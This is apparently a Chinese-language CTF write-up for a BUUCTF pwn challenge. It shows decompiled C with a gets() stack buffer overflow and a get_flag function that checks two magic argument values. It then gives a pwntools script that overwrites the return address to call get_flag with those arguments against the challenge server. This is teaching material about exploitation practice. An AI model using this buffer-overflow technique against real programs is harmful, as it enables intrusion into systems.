逆向
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[56]; // [esp+4h] [ebp-38h] BYREF
printf("Qual a palavrinha magica? ", v4[0]);
gets(v4);
return 0;
}
void __cdecl get_flag(int a1, int a2)
{
int v2; // esi
unsigned __int8 v3; // al
int v4; // ecx
unsigned __int8 v5; // al
if ( a1 == 0x308CD64F && a2 == 0x195719D1 )
{
v2 = fopen("flag.txt", "rt");
v3 = getc(v2);
if ( v3 != 0xFF )
{
v4 = (char)v3;
do
{
putchar(v4);
v5 = getc(v2);
v4 = (char)v5;
}
while ( v5 != 0xFF );
}
fclose(v2);
}
}
攻击思路
a1 == 0x308CD64F && a2 == 0x195719D1
get_flag函数地址0x80489A0
main函数地址0x8048A20
脚本攻击
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
p=remote("node4.buuoj.cn",25455)
payload=b'a'*0x38+p32(0x80489A0)+p32(0x0804e6a0)+p32(0x308CD64F)+p32(0x195719D1)
p.sendline(payload)
p.interactive()
【注意】0x0804e6a0是程序exit的地址,只有程序能够正常退出才能正确的回显flag
(另一种修改内存写入权限的方法)